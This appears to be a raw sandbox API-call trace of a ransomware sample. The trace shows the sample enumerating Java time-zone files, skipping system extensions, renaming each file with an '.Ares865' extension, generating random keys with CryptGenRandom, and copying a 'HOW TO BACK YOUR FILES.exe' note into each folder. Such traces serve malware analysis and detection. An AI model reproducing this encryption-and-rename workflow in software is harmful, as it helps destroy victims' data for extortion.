lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52aa1a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52aa1a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0133.472] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.472] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0133.473] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Antananarivo" | out: lpString1="Antananarivo") returned="Antananarivo" [0133.473] lstrlenW (lpString="Antananarivo") returned 12 [0133.473] lstrlenW (lpString="Ares865") returned 7 [0133.473] lstrcmpiW (lpString1="anarivo", lpString2="Ares865") returned -1 [0133.473] lstrlenW (lpString=".dll") returned 4 [0133.473] lstrcmpiW (lpString1="Antananarivo", lpString2=".dll") returned 1 [0133.473] lstrlenW (lpString=".lnk") returned 4 [0133.473] lstrcmpiW (lpString1="Antananarivo", lpString2=".lnk") returned 1 [0133.473] lstrlenW (lpString=".ini") returned 4 [0133.473] lstrcmpiW (lpString1="Antananarivo", lpString2=".ini") returned 1 [0133.473] lstrlenW (lpString=".sys") returned 4 [0133.473] lstrcmpiW (lpString1="Antananarivo", lpString2=".sys") returned 1 [0133.473] lstrlenW (lpString="Antananarivo") returned 12 [0133.473] lstrlenW (lpString="bak") returned 3 [0133.473] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo.Ares865") returned 67 [0133.473] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo.ares865"), dwFlags=0x1) returned 1 [0133.475] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Antananarivo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\antananarivo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.475] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0133.475] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.476] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.476] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.478] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.479] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.479] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.480] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Chagos" | out: lpString1="Chagos") returned="Chagos" [0133.480] lstrlenW (lpString="Chagos") returned 6 [0133.480] lstrlenW (lpString="Ares865") returned 7 [0133.480] lstrlenW (lpString=".dll") returned 4 [0133.480] lstrcmpiW (lpString1="Chagos", lpString2=".dll") returned 1 [0133.480] lstrlenW (lpString=".lnk") returned 4 [0133.480] lstrcmpiW (lpString1="Chagos", lpString2=".lnk") returned 1 [0133.480] lstrlenW (lpString=".ini") returned 4 [0133.480] lstrcmpiW (lpString1="Chagos", lpString2=".ini") returned 1 [0133.480] lstrlenW (lpString=".sys") returned 4 [0133.480] lstrcmpiW (lpString1="Chagos", lpString2=".sys") returned 1 [0133.480] lstrlenW (lpString="Chagos") returned 6 [0133.480] lstrlenW (lpString="bak") returned 3 [0133.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos.Ares865") returned 61 [0133.480] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos.ares865"), dwFlags=0x1) returned 1 [0133.482] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Chagos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\chagos.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.482] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0133.482] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.483] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.483] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.485] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.486] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.486] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.486] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Christmas.Ares865" | out: lpString1="Christmas.Ares865") returned="Christmas.Ares865" [0133.486] lstrlenW (lpString="Christmas.Ares865") returned 17 [0133.487] lstrlenW (lpString="Ares865") returned 7 [0133.487] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0133.487] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74685fa0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74685fa0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cocos", cAlternateFileName="")) returned 1 [0133.487] lstrcmpiW (lpString1="Cocos", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.487] lstrcmpiW (lpString1="Cocos", lpString2="aoldtz.exe") returned 1 [0133.487] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Cocos" | out: lpString1="Cocos") returned="Cocos" [0133.487] lstrlenW (lpString="Cocos") returned 5 [0133.487] lstrlenW (lpString="Ares865") returned 7 [0133.487] lstrlenW (lpString=".dll") returned 4 [0133.487] lstrcmpiW (lpString1="Cocos", lpString2=".dll") returned 1 [0133.487] lstrlenW (lpString=".lnk") returned 4 [0133.487] lstrcmpiW (lpString1="Cocos", lpString2=".lnk") returned 1 [0133.487] lstrlenW (lpString=".ini") returned 4 [0133.487] lstrcmpiW (lpString1="Cocos", lpString2=".ini") returned 1 [0133.487] lstrlenW (lpString=".sys") returned 4 [0133.487] lstrcmpiW (lpString1="Cocos", lpString2=".sys") returned 1 [0133.487] lstrlenW (lpString="Cocos") returned 5 [0133.487] lstrlenW (lpString="bak") returned 3 [0133.487] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos.Ares865") returned 60 [0133.487] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos.ares865"), dwFlags=0x1) returned 1 [0133.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Cocos.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\cocos.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.489] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0133.490] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.490] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.490] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.493] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.494] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.494] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.494] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Comoro" | out: lpString1="Comoro") returned="Comoro" [0133.494] lstrlenW (lpString="Comoro") returned 6 [0133.494] lstrlenW (lpString="Ares865") returned 7 [0133.494] lstrlenW (lpString=".dll") returned 4 [0133.494] lstrcmpiW (lpString1="Comoro", lpString2=".dll") returned 1 [0133.494] lstrlenW (lpString=".lnk") returned 4 [0133.494] lstrcmpiW (lpString1="Comoro", lpString2=".lnk") returned 1 [0133.494] lstrlenW (lpString=".ini") returned 4 [0133.494] lstrcmpiW (lpString1="Comoro", lpString2=".ini") returned 1 [0133.494] lstrlenW (lpString=".sys") returned 4 [0133.494] lstrcmpiW (lpString1="Comoro", lpString2=".sys") returned 1 [0133.495] lstrlenW (lpString="Comoro") returned 6 [0133.495] lstrlenW (lpString="bak") returned 3 [0133.495] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro.Ares865") returned 61 [0133.495] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro.ares865"), dwFlags=0x1) returned 1 [0133.496] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Comoro.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\comoro.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.496] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.496] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.497] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.497] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.500] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.500] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.500] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.501] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Kerguelen" | out: lpString1="Kerguelen") returned="Kerguelen" [0133.501] lstrlenW (lpString="Kerguelen") returned 9 [0133.501] lstrlenW (lpString="Ares865") returned 7 [0133.501] lstrcmpiW (lpString1="rguelen", lpString2="Ares865") returned 1 [0133.501] lstrlenW (lpString=".dll") returned 4 [0133.501] lstrcmpiW (lpString1="Kerguelen", lpString2=".dll") returned 1 [0133.501] lstrlenW (lpString=".lnk") returned 4 [0133.501] lstrcmpiW (lpString1="Kerguelen", lpString2=".lnk") returned 1 [0133.501] lstrlenW (lpString=".ini") returned 4 [0133.501] lstrcmpiW (lpString1="Kerguelen", lpString2=".ini") returned 1 [0133.501] lstrlenW (lpString=".sys") returned 4 [0133.501] lstrcmpiW (lpString1="Kerguelen", lpString2=".sys") returned 1 [0133.501] lstrlenW (lpString="Kerguelen") returned 9 [0133.501] lstrlenW (lpString="bak") returned 3 [0133.501] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen.Ares865") returned 64 [0133.502] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen.ares865"), dwFlags=0x1) returned 1 [0133.503] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Kerguelen.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\kerguelen.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.503] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.503] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.504] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.504] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.507] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.507] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.507] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.508] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Mahe" | out: lpString1="Mahe") returned="Mahe" [0133.508] lstrlenW (lpString="Mahe") returned 4 [0133.508] lstrlenW (lpString="Ares865") returned 7 [0133.508] lstrlenW (lpString=".dll") returned 4 [0133.508] lstrlenW (lpString=".lnk") returned 4 [0133.508] lstrlenW (lpString=".ini") returned 4 [0133.508] lstrlenW (lpString=".sys") returned 4 [0133.508] lstrlenW (lpString="Mahe") returned 4 [0133.508] lstrlenW (lpString="bak") returned 3 [0133.508] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe.Ares865") returned 59 [0133.508] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe.ares865"), dwFlags=0x1) returned 1 [0133.510] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mahe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mahe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.510] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.510] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.595] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.596] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.597] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.597] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Maldives" | out: lpString1="Maldives") returned="Maldives" [0133.597] lstrlenW (lpString="Maldives") returned 8 [0133.597] lstrlenW (lpString="Ares865") returned 7 [0133.597] lstrcmpiW (lpString1="aldives", lpString2="Ares865") returned -1 [0133.597] lstrlenW (lpString=".dll") returned 4 [0133.597] lstrcmpiW (lpString1="Maldives", lpString2=".dll") returned 1 [0133.597] lstrlenW (lpString=".lnk") returned 4 [0133.597] lstrcmpiW (lpString1="Maldives", lpString2=".lnk") returned 1 [0133.597] lstrlenW (lpString=".ini") returned 4 [0133.597] lstrcmpiW (lpString1="Maldives", lpString2=".ini") returned 1 [0133.598] lstrlenW (lpString=".sys") returned 4 [0133.598] lstrcmpiW (lpString1="Maldives", lpString2=".sys") returned 1 [0133.598] lstrlenW (lpString="Maldives") returned 8 [0133.598] lstrlenW (lpString="bak") returned 3 [0133.598] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives.Ares865") returned 63 [0133.598] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives.ares865"), dwFlags=0x1) returned 1 [0133.601] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Maldives.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\maldives.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.601] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.601] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.640] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.642] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.642] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.642] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Mauritius" | out: lpString1="Mauritius") returned="Mauritius" [0133.643] lstrlenW (lpString="Mauritius") returned 9 [0133.643] lstrlenW (lpString="Ares865") returned 7 [0133.643] lstrcmpiW (lpString1="uritius", lpString2="Ares865") returned 1 [0133.643] lstrlenW (lpString=".dll") returned 4 [0133.643] lstrcmpiW (lpString1="Mauritius", lpString2=".dll") returned 1 [0133.643] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius.Ares865") returned 64 [0133.643] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius.ares865"), dwFlags=0x1) returned 1 [0133.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Mauritius.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\mauritius.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.646] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=105) returned 1 [0133.647] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.647] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.647] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.655] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.659] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.659] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.661] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Mayotte.Ares865" | out: lpString1="Mayotte.Ares865") returned="Mayotte.Ares865" [0133.663] lstrlenW (lpString="Mayotte.Ares865") returned 15 [0133.663] lstrlenW (lpString="Ares865") returned 7 [0133.663] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0133.663] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74685fa0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x74685fa0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x74685fa0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reunion", cAlternateFileName="")) returned 1 [0133.663] lstrcmpiW (lpString1="Reunion", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0133.663] lstrcmpiW (lpString1="Reunion", lpString2="aoldtz.exe") returned 1 [0133.663] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Reunion" | out: lpString1="Reunion") returned="Reunion" [0133.664] lstrlenW (lpString="Reunion") returned 7 [0133.664] lstrlenW (lpString="Ares865") returned 7 [0133.667] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion.Ares865") returned 62 [0133.669] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion.ares865"), dwFlags=0x1) returned 1 [0133.675] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.675] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0133.677] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.683] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.683] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.695] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.706] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.708] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.720] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe" [0133.725] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe" [0133.728] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0133.728] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0133.734] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0133.734] GetLastError () returned 0x0 